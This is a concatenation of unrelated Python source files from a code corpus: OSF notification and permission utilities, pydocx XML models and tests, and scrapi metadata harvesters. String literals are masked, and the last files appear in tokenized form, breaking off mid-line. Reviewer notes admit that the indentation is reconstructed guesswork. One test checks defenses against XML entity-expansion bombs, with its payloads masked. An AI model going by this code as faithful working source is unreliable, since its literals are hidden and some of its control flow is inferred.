        # NOTE(review): iterating the default None would raise TypeError —
        # callers evidently always pass a list.
        self.targets = [target for target in targets if target]

    def __str__(self):
        return str(self._to_dict())

    def _to_dict(self):
        # Same masked-key collapse caveat as StatResult._to_dict.
        return {
            '<STR_LIT>': self.target_id,
            '<STR_LIT>': self.target_name,
            '<STR_LIT>': [
                target._to_dict()
                for target in self.targets
            ],
            '<STR_LIT>': self.num_files,
            '<STR_LIT>': self.disk_usage,
        }

    @property
    def num_files(self):
        # Total file count over all surviving targets.
        return sum([value.num_files for value in self.targets])

    @property
    def disk_usage(self):
        # Total disk usage over all surviving targets.
        return sum([value.disk_usage for value in self.targets])
# GitHub-backed file model classes. Provider/name strings are masked as
# '<STR_LIT>' in this corpus and preserved verbatim.
from website.files.models.base import File, Folder, FileNode

__all__ = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')


class GithubFileNode(FileNode):
    # Common provider tag shared by file and folder subclasses.
    provider = '<STR_LIT>'


class GithubFolder(GithubFileNode, Folder):
    pass


class GithubFile(GithubFileNode, File):
    version_identifier = '<STR_LIT>'

    def touch(self, auth_header, revision=None, ref=None, branch=None, **kwargs):
        # Accept any of the three GitHub-style revision spellings; the first
        # non-None value wins, then delegate to the base implementation.
        revision = revision or ref or branch
        return super(GithubFile, self).touch(auth_header, revision=revision, **kwargs)
# Notification subscription utilities. All masked '<STR_LIT>' literals are
# preserved verbatim from the tokenized corpus; indentation at ambiguous dedent
# points is reconstructed on a best-effort basis (marked with NOTE(review)).
import collections

from modularodm import Q
from modularodm.exceptions import NoResultsFound

from framework.auth import signals
from website.models import Node, User
from website.notifications import constants
from website.notifications import model
from website.notifications.model import NotificationSubscription


class NotificationsDict(dict):
    def __init__(self):
        super(NotificationsDict, self).__init__()
        # Each node in the tree carries its own messages plus lazily-created
        # child dictionaries of the same shape.
        self.update(messages=[], children=collections.defaultdict(NotificationsDict))

    def add_message(self, keys, messages):
        """<STR_LIT>"""
        # Walk down the child tree following `keys`, then append the messages.
        d_to_use = self
        for key in keys:
            d_to_use = d_to_use['<STR_LIT>'][key]
        if not isinstance(messages, list):
            messages = [messages]
        d_to_use['<STR_LIT>'].extend(messages)


def find_subscription_type(subscription):
    """<STR_LIT>"""
    # Returns the first known event name contained in the subscription string,
    # or None implicitly when nothing matches.
    subs_available = list(constants.USER_SUBSCRIPTIONS_AVAILABLE.keys())
    subs_available.extend(list(constants.NODE_SUBSCRIPTIONS_AVAILABLE.keys()))
    for available in subs_available:
        if available in subscription:
            return available


def to_subscription_key(uid, event):
    """<STR_LIT>"""
    return u'<STR_LIT>'.format(uid, event)


def from_subscription_key(key):
    # Split only on the first underscore so event names may contain more.
    parsed_key = key.split("_", 1)
    return {
        '<STR_LIT>': parsed_key[0],
        '<STR_LIT>': parsed_key[1]
    }


@signals.contributor_removed.connect
def remove_contributor_from_subscriptions(contributor, node):
    """<STR_LIT>"""
    # Admin contributors keep their subscriptions; everyone else is unsubscribed.
    if contributor._id not in node.admin_contributor_ids:
        node_subscriptions = get_all_node_subscriptions(contributor, node)
        for subscription in node_subscriptions:
            subscription.remove_user_from_subscription(contributor)


@signals.node_deleted.connect
def remove_subscription(node):
    # Drop the node's own subscriptions, then scrub it out of the parent's
    # per-user child-subscription index.
    model.NotificationSubscription.remove(Q('<STR_LIT>', '<STR_LIT>', node))
    parent = node.parent_node
    if parent and parent.child_node_subscriptions:
        for user_id in parent.child_node_subscriptions:
            if node._id in parent.child_node_subscriptions[user_id]:
                parent.child_node_subscriptions[user_id].remove(node._id)
        # NOTE(review): dedent level of this save is inferred — confirm against
        # the original source.
        parent.save()


def separate_users(node, user_ids):
    """<STR_LIT>"""
    # Partition user ids by whether they still hold the required permission.
    removed = []
    subbed = []
    for user_id in user_ids:
        try:
            user = User.load(user_id)
        except TypeError:
            # Already a user object rather than an id.
            user = user_id
        if node.has_permission(user, '<STR_LIT>'):
            subbed.append(user_id)
        else:
            removed.append(user_id)
    return subbed, removed


def users_to_remove(source_event, source_node, new_node):
    """<STR_LIT>"""
    removed_users = {key: [] for key in constants.NOTIFICATION_TYPES}
    if source_node == new_node:
        return removed_users
    old_sub = NotificationSubscription.load(to_subscription_key(source_node._id, source_event))
    # The node-level subscription keeps only the trailing two event segments.
    old_node_sub = NotificationSubscription.load(to_subscription_key(source_node._id,
                                                                     '_'.join(source_event.split('_')[-2:])))
    if not old_sub and not old_node_sub:
        return removed_users
    for notification_type in constants.NOTIFICATION_TYPES:
        users = getattr(old_sub, notification_type, []) + getattr(old_node_sub, notification_type, [])
        subbed, removed_users[notification_type] = separate_users(new_node, users)
    return removed_users


def move_subscription(remove_users, source_event, source_node, new_event, new_node):
    """<STR_LIT>"""
    if source_node == new_node:
        return
    old_sub = NotificationSubscription.load(to_subscription_key(source_node._id, source_event))
    if not old_sub:
        return
    elif old_sub:
        # Rekey the old subscription onto the destination node/event.
        old_sub.update_fields(_id=to_subscription_key(new_node._id, new_event), event_name=new_event,
                              owner=new_node)
    new_sub = old_sub
    # Strip users who lost permission on the destination node.
    for notification_type in constants.NOTIFICATION_TYPES:
        if new_sub:
            for user_id in remove_users[notification_type]:
                if user_id in getattr(new_sub, notification_type, []):
                    user = User.load(user_id)
                    new_sub.remove_user_from_subscription(user)


def get_configured_projects(user):
    """<STR_LIT>"""
    configured_project_ids = set()
    user_subscriptions = get_all_user_subscriptions(user)
    for subscription in user_subscriptions:
        if subscription is None:
            continue
        node = subscription.owner
        # Skip non-node owners, and top-level nodes where the user opted out.
        if not isinstance(node, Node) or (user in subscription.none and not node.parent_id):
            continue
        # Climb to the project root.
        while node.parent_id and not node.is_deleted:
            node = Node.load(node.parent_id)
        if not node.is_deleted:
            configured_project_ids.add(node._id)
    return list(configured_project_ids)


def check_project_subscriptions_are_all_none(user, node):
    # True when the user has opted out ('none') of every subscription on node.
    node_subscriptions = get_all_node_subscriptions(user, node)
    for s in node_subscriptions:
        if user not in s.none:
            return False
    return True


def get_all_user_subscriptions(user):
    """<STR_LIT>"""
    # Generator over the user's subscriptions across every notification type.
    for notification_type in constants.NOTIFICATION_TYPES:
        query = NotificationSubscription.find(Q(notification_type, '<STR_LIT>', user._id))
        for subscription in query:
            yield subscription


def get_all_node_subscriptions(user, node, user_subscriptions=None):
    """<STR_LIT>"""
    if not user_subscriptions:
        user_subscriptions = get_all_user_subscriptions(user)
    for subscription in user_subscriptions:
        if subscription and subscription.owner == node:
            yield subscription


def format_data(user, node_ids):
    """<STR_LIT>"""
    items = []
    for node_id in node_ids:
        node = Node.load(node_id)
        assert node, '<STR_LIT>'.format(node_id)
        can_read = node.has_permission(user, '<STR_LIT>')
        can_read_children = node.has_permission_on_children(user, '<STR_LIT>')
        # Nodes invisible to the user (directly and transitively) are skipped.
        if not can_read and not can_read_children:
            continue
        children = []
        if can_read:
            node_sub_available = list(constants.NODE_SUBSCRIPTIONS_AVAILABLE.keys())
            subscriptions = [subscription for subscription in get_all_node_subscriptions(user, node)
                             if getattr(subscription, '<STR_LIT>') in node_sub_available]
            # Serialize existing subscriptions, consuming their event slot...
            for subscription in subscriptions:
                index = node_sub_available.index(getattr(subscription, '<STR_LIT>'))
                children.append(serialize_event(user, subscription=subscription,
                                                node=node, event_description=node_sub_available.pop(index)))
            # ...then emit defaults for the events with no subscription yet.
            for node_sub in node_sub_available:
                children.append(serialize_event(user, node=node, event_description=node_sub))
            children.sort(key=lambda s: s['<STR_LIT>']['title'])
        # Recurse into primary, non-deleted child nodes.
        # NOTE(review): dedent level of this extend (inside vs. after the
        # can_read branch) is inferred — confirm against the original source.
        children.extend(format_data(
            user,
            [
                n._id
                for n in node.nodes
                if n.primary and
                not n.is_deleted
            ]
        ))
        item = {
            '<STR_LIT>': {
                'id': node_id,
                'url': node.url if can_read else '<STR_LIT>',
                'title': node.title if can_read else '<STR_LIT>',
            },
            '<STR_LIT>': children,
            '<STR_LIT>': '<STR_LIT>' if not node.node__parent or not node.parent_node.has_permission(user, '<STR_LIT>') else '<STR_LIT>',
            '<STR_LIT>': node.project_or_component,
            '<STR_LIT>': node.category,
            '<STR_LIT>': {
                '<STR_LIT>': can_read,
            },
        }
        items.append(item)
    return items


def format_user_subscriptions(user):
    """<STR_LIT>"""
    user_subs_available = list(constants.USER_SUBSCRIPTIONS_AVAILABLE.keys())
    # Existing subscriptions consume their event slot; the leftovers are
    # emitted as unsubscribed defaults below.
    subscriptions = [
        serialize_event(
            user, subscription,
            event_description=user_subs_available.pop(user_subs_available.index(getattr(subscription, '<STR_LIT>')))
        )
        for subscription in get_all_user_subscriptions(user)
        if subscription is not None and getattr(subscription, '<STR_LIT>') in user_subs_available
    ]
    subscriptions.extend([serialize_event(user, event_description=sub) for sub in user_subs_available])
    return subscriptions


def format_file_subscription(user, node_id, path, provider):
    """<STR_LIT>"""
    node = Node.load(node_id)
    wb_path = path.lstrip('/')
    for subscription in get_all_node_subscriptions(user, node):
        if wb_path in getattr(subscription, '<STR_LIT>'):
            return serialize_event(user, subscription, node)
    # No subscription matched the file path: serialize a default event.
    return serialize_event(user, node=node, event_description='<STR_LIT>')


def serialize_event(user, subscription=None, node=None, event_description=None):
    """<STR_LIT>"""
    all_subs = constants.NODE_SUBSCRIPTIONS_AVAILABLE.copy()
    all_subs.update(constants.USER_SUBSCRIPTIONS_AVAILABLE)
    if not event_description:
        event_description = getattr(subscription, '<STR_LIT>')
        # NOTE(review): the last matching sub_type wins here (no break) —
        # preserved as-is from the source.
        for sub_type in all_subs:
            if sub_type in event_description:
                event_type = sub_type
    else:
        event_type = event_description
    if node and node.node__parent:
        notification_type = '<STR_LIT>'
    else:
        notification_type = 'none'
    if subscription:
        for n_type in constants.NOTIFICATION_TYPES:
            if user in getattr(subscription, n_type):
                notification_type = n_type
    return {
        '<STR_LIT>': {
            'title': event_description,
            'description': all_subs[event_type],
            '<STR_LIT>': notification_type,
            '<STR_LIT>': get_parent_notification_type(node, event_type, user)
        },
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': []
    }


def get_parent_notification_type(node, event, user):
    """<STR_LIT>"""
    if node and isinstance(node, Node) and node.node__parent and node.parent_node.has_permission(user, '<STR_LIT>'):
        for parent in node.node__parent:
            key = to_subscription_key(parent._id, event)
            try:
                subscription = model.NotificationSubscription.find_one(Q('<STR_LIT>', '<STR_LIT>', key))
            except NoResultsFound:
                # No subscription on this parent: keep climbing.
                return get_parent_notification_type(parent, event, user)
            for notification_type in constants.NOTIFICATION_TYPES:
                if user in getattr(subscription, notification_type):
                    return notification_type
            else:
                # for/else: the user is in none of the types — keep climbing.
                return get_parent_notification_type(parent, event, user)
    else:
        return None


def format_user_and_project_subscriptions(user):
    """<STR_LIT>"""
    # Two top-level panels: user-level events and per-project events.
    return [
        {
            '<STR_LIT>': {
                'id': user._id,
                'title': '<STR_LIT>',
            },
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': format_user_subscriptions(user)
        },
        {
            '<STR_LIT>': {
                'id': '<STR_LIT>',
                'title': '<STR_LIT>',
            },
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': format_data(user, get_configured_projects(user))
        }]
# Log-listing views. Masked '<STR_LIT>' literals preserved verbatim from the
# tokenized corpus.
import httplib as http
import logging
import math

from flask import request

from framework.exceptions import HTTPError
from framework.auth.decorators import collect_auth
from framework.transactions.handlers import no_auto_transaction

from website.views import serialize_log, validate_page_num
from website.project.model import NodeLog
from website.project.model import has_anonymous_link
from website.project.decorators import must_be_valid_project

logger = logging.getLogger(__name__)


@collect_auth
@no_auto_transaction
def get_log(auth, log_id):
    # Serialize a single log entry, enforcing view permission on its node.
    log = NodeLog.load(log_id)
    node_to_use = log.node
    if not node_to_use.can_view(auth):
        raise HTTPError(http.FORBIDDEN)
    return {'<STR_LIT>': serialize_log(log, auth=auth)}


def _get_logs(node, count, auth, page=0):
    """<STR_LIT>"""
    # Paginate the node's aggregate log queryset and serialize one page.
    logs_set = node.get_aggregate_logs_queryset(auth)
    total = logs_set.count()
    pages = math.ceil(total / float(count))
    validate_page_num(page, pages)
    start = page * count
    stop = start + count
    logs = [
        serialize_log(log, auth=auth, anonymous=has_anonymous_link(node, auth))
        for log in logs_set[start:stop]
    ]
    return logs, total, pages


@no_auto_transaction
@collect_auth
@must_be_valid_project(retractions_valid=True)
def get_logs(auth, node, **kwargs):
    """ """
    try:
        page = int(request.args.get('<STR_LIT>', 0))
    except ValueError:
        raise HTTPError(http.BAD_REQUEST, data=dict(
            message_long='<STR_LIT>'
        ))
    if not node.can_view(auth):
        raise HTTPError(http.FORBIDDEN)
    # Page size resolution order: query string, view kwargs, JSON body, default.
    if 'count' in request.args:
        count = int(request.args['count'])
    elif 'count' in kwargs:
        count = kwargs['count']
    elif request.json and 'count' in request.json.keys():
        count = request.json['count']
    else:
        count = 10
    logs, total, pages = _get_logs(node, count, auth, page)
    return {'<STR_LIT>': logs, '<STR_LIT>': total, '<STR_LIT>': pages, '<STR_LIT>': page}
# Permission level constants and helpers. The three level strings are masked
# as identical '<STR_LIT>' placeholders in this corpus; in the real source they
# are distinct, ordered from weakest to strongest.
READ = '<STR_LIT>'
WRITE = '<STR_LIT>'
ADMIN = '<STR_LIT>'

# Canonical ordering, weakest first.
PERMISSIONS = [READ, WRITE, ADMIN]
CREATOR_PERMISSIONS = [READ, WRITE, ADMIN]
DEFAULT_CONTRIBUTOR_PERMISSIONS = [READ, WRITE]


def expand_permissions(permission):
    # A single level implies every weaker level; falsy input expands to nothing.
    if not permission:
        return []
    index = PERMISSIONS.index(permission) + 1
    return PERMISSIONS[:index]


def reduce_permissions(permissions):
    # Return the strongest level present in the iterable.
    for permission in PERMISSIONS[::-1]:
        if permission in permissions:
            return permission
    raise ValueError('<STR_LIT>')
# Public re-exports for the pydocx packaging subpackage. The masked
# '<STR_LIT>' entries in __all__ correspond to the ten imported class names.
from pydocx.openxml.packaging.font_table_part import FontTablePart
from pydocx.openxml.packaging.footnotes_part import FootnotesPart
from pydocx.openxml.packaging.image_part import ImagePart
from pydocx.openxml.packaging.main_document_part import MainDocumentPart
from pydocx.openxml.packaging.numbering_definitions_part import NumberingDefinitionsPart
from pydocx.openxml.packaging.open_xml_package import OpenXmlPackage
from pydocx.openxml.packaging.open_xml_part import OpenXmlPart
from pydocx.openxml.packaging.open_xml_part_container import OpenXmlPartContainer
from pydocx.openxml.packaging.style_definitions_part import StyleDefinitionsPart
from pydocx.openxml.packaging.word_processing_document import WordprocessingDocument

__all__ = [
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
]
from __future__ import (
    absolute_import,
    print_function,
    unicode_literals,
)

from pydocx.models import XmlModel, XmlAttribute


class FootnoteReference(XmlModel):
    XML_TAG = '<STR_LIT>'

    # XML attribute named 'id' linking this reference to a footnote definition.
    footnote_id = XmlAttribute(name='id')

    @property
    def footnote(self):
        # Resolve the referenced footnote lazily; implicitly returns None when
        # the id is missing or the document has no footnotes part.
        if not self.footnote_id:
            return
        part = self.container.footnotes_part
        if not part:
            return
        footnotes = part.footnotes
        footnote = footnotes.get_footnote_by_id(footnote_id=self.footnote_id)
        return footnote
from __future__ import (
    absolute_import,
    print_function,
    unicode_literals,
)

from pydocx.models import XmlModel, XmlCollection
from pydocx.openxml.wordprocessing.table_cell import TableCell


class TableRow(XmlModel):
    XML_TAG = '<STR_LIT>'

    # Child cells of the row, in document order.
    cells = XmlCollection(
        TableCell,
    )
from __future__ import (
    absolute_import,
    print_function,
    unicode_literals,
)

from nose import SkipTest

from pydocx.test import DocumentGeneratorTestCase
from pydocx.test.utils import WordprocessingDocumentFactory
from pydocx.openxml.packaging import MainDocumentPart


class XMLVulnerabilitiesTestCase(DocumentGeneratorTestCase):
    # Both tests follow the same pattern: build a document whose XML header
    # contains a hostile entity payload, then require that parsing raises
    # defusedxml.EntitiesForbidden instead of expanding the entities. The
    # deliberate AssertionError fires only if conversion unexpectedly succeeds.

    def test_exponential_entity_expansion(self):
        try:
            import defusedxml
        except ImportError:
            defusedxml = None
        if defusedxml is None:
            raise SkipTest('<STR_LIT>')
        document_xml = '''<STR_LIT>'''
        xml_header = '''<STR_LIT>'''
        document = WordprocessingDocumentFactory(xml_header=xml_header)
        document.add(MainDocumentPart, document_xml)
        expected_html = '<STR_LIT>'
        try:
            self.assert_document_generates_html(document, expected_html)
            raise AssertionError(
                '<STR_LIT>',
            )
        except defusedxml.EntitiesForbidden:
            pass

    def test_entity_blowup(self):
        try:
            import defusedxml
        except ImportError:
            defusedxml = None
        if defusedxml is None:
            raise SkipTest('<STR_LIT>')
        document_xml = '''<STR_LIT>'''
        xml_header = '''<STR_LIT>'''
        document = WordprocessingDocumentFactory(xml_header=xml_header)
        document.add(MainDocumentPart, document_xml)
        expected_html = '<STR_LIT>'
        try:
            self.assert_document_generates_html(document, expected_html)
            raise AssertionError(
                '<STR_LIT>',
            )
        except defusedxml.EntitiesForbidden:
            pass
from __future__ import (
    absolute_import,
    print_function,
    unicode_literals,
)

from unittest import TestCase

from pydocx.exceptions import MalformedDocxException
from pydocx.util.xml import (
    el_iter,
    parse_xml_from_string,
    xml_remove_namespaces,
    xml_tag_split,
    XmlNamespaceManager,
)


def elements_to_tags(elements):
    # Yield each element's tag in iteration order.
    for element in elements:
        yield element.tag


def make_xml(s):
    # Prepend the (masked) XML declaration bytes, then parse.
    xml = b'<STR_LIT>' + s
    return parse_xml_from_string(xml)


def remove_whitespace(s):
    # Collapse all whitespace runs using the masked join separator.
    return '<STR_LIT>'.join(s.split())


class UtilsTestCase(TestCase):
    def test_el_iter(self):
        root = make_xml(b'<STR_LIT>')
        expected = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']
        result = el_iter(root)
        self.assertEqual(list(elements_to_tags(result)), expected)

    def test_remove_namespaces(self):
        xml = b'''<STR_LIT>'''
        expected = '<STR_LIT>'
        result = xml_remove_namespaces(xml)
        # The stripper must return bytes, which decode to the expected XML.
        assert isinstance(result, bytes)
        result = remove_whitespace(result.decode('utf-8'))
        self.assertEqual(result, expected)

    def test_remove_namespaces_on_namespaceless_xml(self):
        # Already-namespaceless input passes through unchanged.
        xml = b'<STR_LIT>'
        expected = '<STR_LIT>'
        result = xml_remove_namespaces(xml)
        assert isinstance(result, bytes)
        result = remove_whitespace(result.decode('utf-8'))
        self.assertEqual(result, expected)

    def test_remove_namespaces_junk_xml_causes_malformed_exception(self):
        self.assertRaises(
            MalformedDocxException,
            lambda: xml_remove_namespaces('foo')
        )

    def test_xml_tag_split(self):
        self.assertEqual(xml_tag_split('<STR_LIT>'), ('foo', 'bar'))
        # A tag with no namespace splits to (None, tag).
        self.assertEqual(xml_tag_split('bar'), (None, 'bar'))


class XmlNamespaceManagerTestCase(TestCase):
    def test_namespace_manager(self):
        xml = '''<STR_LIT>'''
        root = parse_xml_from_string(xml)
        # One registered namespace: only its children are yielded.
        manager = XmlNamespaceManager()
        manager.add_namespace('<STR_LIT>')
        tags = []
        for element in manager.iterate_children(root):
            tags.append(element.tag)
        expected_tags = [
            '<STR_LIT>',
            '<STR_LIT>',
        ]
        self.assertEqual(tags, expected_tags)
        # Adding a second namespace widens the yielded set.
        manager.add_namespace('<STR_LIT>')
        tags = []
        for element in manager.iterate_children(root):
            tags.append(element.tag)
        expected_tags = [
            '<STR_LIT>',
            '<STR_LIT>',
            '<STR_LIT>',
        ]
        self.assertEqual(tags, expected_tags)
        # A fresh manager with a different namespace yields only its children.
        manager = XmlNamespaceManager()
        manager.add_namespace('<STR_LIT>')
        tags = []
        for element in manager.iterate_children(root):
            tags.append(element.tag)
        expected_tags = [
            '<STR_LIT>',
        ]
        self.assertEqual(tags, expected_tags)
"""<STR_LIT>"""
from __future__ import unicode_literals

from scrapi.base import OAIHarvester


class ArxivHarvester(OAIHarvester):
    # Identity and endpoint configuration for the arXiv OAI-PMH harvester;
    # URL values are masked as '<STR_LIT>' in this corpus.
    short_name = '<STR_LIT>'
    long_name = '<STR_LIT>'
    url = '<STR_LIT>'
    timeout = 30
    base_url = '<STR_LIT>'

    # Extra OAI properties to keep from each record.
    property_list = [
        'type', '<STR_LIT>', 'date',
        '<STR_LIT>', '<STR_LIT>', 'description'
    ]
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import datetime <EOL> import json <EOL> import logging <EOL> import sys <EOL> from itertools import chain <EOL> from lxml import etree <EOL> from scrapi import requests <EOL> from scrapi import settings <EOL> from scrapi . base import XMLHarvester <EOL> from scrapi . base . helpers import build_properties , compose , single_result , datetime_formatter <EOL> from scrapi . linter . document import RawDocument <EOL> logger = logging . getLogger ( __name__ ) <EOL> def collapse_list ( list_of_strings ) : <EOL> text = '<STR_LIT>' . join ( list_of_strings ) <EOL> return text <EOL> def elife_name_parser ( names ) : <EOL> contributors = [ ] <EOL> for i in range ( <NUM_LIT:0> , len ( names ) , <NUM_LIT:2> ) : <EOL> chunka = names [ i : i + <NUM_LIT:2> ] <EOL> chunkb = chunka [ <NUM_LIT:1> ] . split ( "<STR_LIT:U+0020>" ) <EOL> name = ( chunka + chunkb ) <EOL> del name [ <NUM_LIT:1> ] <EOL> contributors . append ( name ) <EOL> parsed_contributors = [ ] <EOL> for contributor in contributors : <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> contributor = map ( lambda x : x . encode ( '<STR_LIT:utf-8>' ) , contributor ) <EOL> if len ( contributor ) == <NUM_LIT:3> : <EOL> full_name = contributor [ <NUM_LIT:1> ] + str ( "<STR_LIT:U+0020>" ) + contributor [ <NUM_LIT:2> ] + str ( "<STR_LIT:U+0020>" ) + contributor [ <NUM_LIT:0> ] <EOL> first_name = contributor [ <NUM_LIT:1> ] <EOL> middle_name = contributor [ <NUM_LIT:2> ] <EOL> last_name = contributor [ <NUM_LIT:0> ] <EOL> else : <EOL> full_name = contributor [ <NUM_LIT:1> ] + str ( "<STR_LIT:U+0020>" ) + contributor [ <NUM_LIT:0> ] <EOL> first_name = contributor [ <NUM_LIT:1> ] <EOL> middle_name = "<STR_LIT>" <EOL> last_name = contributor [ <NUM_LIT:0> ] <EOL> contributor_dict = { <EOL> '<STR_LIT:name>' : full_name , <EOL> '<STR_LIT>' : first_name , <EOL> '<STR_LIT>' : middle_name , <EOL> '<STR_LIT>' : last_name <EOL> } <EOL> parsed_contributors . 
append ( contributor_dict ) <EOL> return parsed_contributors <EOL> def elife_date_parser ( date ) : <EOL> date_form = datetime . datetime ( int ( date [ <NUM_LIT:2> ] ) , int ( date [ <NUM_LIT:1> ] ) , int ( date [ <NUM_LIT:0> ] ) , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> return date_form . date ( ) . isoformat ( ) <EOL> def fetch_commits ( base_url , start_date , end_date ) : <EOL> jsonstr = "<STR_LIT>" <EOL> i = <NUM_LIT:1> <EOL> while True : <EOL> resp = requests . get ( base_url , params = { <EOL> '<STR_LIT>' : start_date , <EOL> '<STR_LIT>' : end_date , <EOL> '<STR_LIT>' : i , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } ) <EOL> jsonchunk = resp . content . decode ( '<STR_LIT:utf-8>' ) <EOL> if len ( jsonchunk ) <= <NUM_LIT:2> : <EOL> break <EOL> i += <NUM_LIT:1> <EOL> jsonchunk = jsonchunk . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> jsonchunk = jsonchunk [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> jsonstr = jsonstr + "<STR_LIT>" + jsonchunk <EOL> jsonarr = jsonstr . split ( '<STR_LIT>' ) [ <NUM_LIT:1> : ] <EOL> shas = [ ] <EOL> for jsonstring in jsonarr : <EOL> jsonobj = json . loads ( jsonstring ) <EOL> shas . append ( jsonobj [ '<STR_LIT>' ] ) <EOL> return shas <EOL> def fetch_file_names ( commit_url , sha ) : <EOL> resp = requests . get ( commit_url . format ( sha ) ) <EOL> jsonstr = resp . content . decode ( '<STR_LIT:utf-8>' ) <EOL> jsonobj = json . loads ( jsonstr ) <EOL> files = [ d [ '<STR_LIT:filename>' ] for d in jsonobj [ '<STR_LIT>' ] ] <EOL> return files <EOL> def fetch_xml ( xml_url , filename ) : <EOL> xml_text = requests . get ( xml_url . format ( filename ) ) . content <EOL> xml = etree . 
fromstring ( xml_text ) <EOL> return xml <EOL> class ELifeHarvester ( XMLHarvester ) : <EOL> short_name = '<STR_LIT>' <EOL> long_name = '<STR_LIT>' <EOL> url = '<STR_LIT>' <EOL> DEFAULT_ENCODING = '<STR_LIT>' <EOL> record_encoding = None <EOL> namespaces = { } <EOL> MAX_ROWS_PER_REQUEST = <NUM_LIT> <EOL> BASE_URL = '<STR_LIT>' <EOL> BASE_COMMIT_URL = '<STR_LIT>' <EOL> BASE_DATA_URL = '<STR_LIT>' <EOL> def harvest ( self , start_date = None , end_date = None ) : <EOL> start_date = start_date or datetime . date . today ( ) - datetime . timedelta ( settings . DAYS_BACK ) <EOL> end_date = end_date or datetime . date . today ( ) <EOL> shas = fetch_commits ( self . BASE_URL , start_date . isoformat ( ) , end_date . isoformat ( ) ) <EOL> files = list ( set ( chain . from_iterable ( [ <EOL> fetch_file_names ( self . BASE_COMMIT_URL , sha ) <EOL> for sha in shas ] ) ) ) <EOL> files = filter ( lambda filename : filename . endswith ( '<STR_LIT>' ) , files ) <EOL> xml_records = [ <EOL> fetch_xml ( self . BASE_DATA_URL , filename ) <EOL> for filename in files <EOL> ] <EOL> return [ <EOL> RawDocument ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : self . short_name , <EOL> '<STR_LIT>' : etree . tostring ( record ) , <EOL> '<STR_LIT>' : record . xpath ( '<STR_LIT>' ) [ <NUM_LIT:0> ] . text , <EOL> } ) for record in xml_records <EOL> ] <EOL> schema = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , compose ( '<STR_LIT>' . format , <EOL> single_result ) ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , compose ( '<STR_LIT>' . 
format , single_result ) ) <EOL> } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , elife_name_parser ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , <EOL> compose ( datetime_formatter , elife_date_parser ) ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , collapse_list ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , collapse_list ) , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , single_result ) <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , <EOL> elife_date_parser ) <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : build_properties ( <EOL> ( '<STR_LIT>' , ( '<STR_LIT>' , single_result ) ) <EOL> ) <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import json <EOL> import logging <EOL> from datetime import date , timedelta <EOL> import six <EOL> from scrapi import requests <EOL> from scrapi import settings <EOL> from scrapi . base import JSONHarvester <EOL> from scrapi . linter . document import RawDocument <EOL> from scrapi . base . helpers import build_properties , datetime_formatter <EOL> logger = logging . getLogger ( __name__ ) <EOL> def process_NSF_contributors ( firstname , lastname , awardeename ) : <EOL> return [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' . format ( firstname , lastname ) , <EOL> '<STR_LIT>' : firstname , <EOL> '<STR_LIT>' : lastname , <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : awardeename <EOL> } <EOL> ] <EOL> def process_nsf_uris ( awd_id ) : <EOL> nsf_url = '<STR_LIT>' . format ( awd_id ) <EOL> return { <EOL> '<STR_LIT>' : nsf_url , <EOL> '<STR_LIT>' : [ nsf_url ] <EOL> } <EOL> def process_sponsorships ( agency , awd_id , title ) : <EOL> return [ <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : agency <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' . 
format ( awd_id ) , <EOL> '<STR_LIT>' : title <EOL> } <EOL> } <EOL> ] <EOL> class NSFAwards ( JSONHarvester ) : <EOL> short_name = '<STR_LIT>' <EOL> long_name = '<STR_LIT>' <EOL> url = '<STR_LIT>' <EOL> URL = '<STR_LIT>' <EOL> schema = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , process_NSF_contributors ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , datetime_formatter ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , process_nsf_uris ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , process_sponsorships ) , <EOL> '<STR_LIT>' : build_properties ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> } <EOL> def harvest ( self , start_date = None , end_date = None ) : <EOL> start_date = start_date if start_date else date . today ( ) - timedelta ( settings . DAYS_BACK ) <EOL> end_date = end_date - timedelta ( <NUM_LIT:1> ) if end_date else date . today ( ) - timedelta ( <NUM_LIT:1> ) <EOL> search_url = '<STR_LIT>' . format ( <EOL> self . URL , <EOL> start_date . strftime ( '<STR_LIT>' ) , <EOL> end_date . 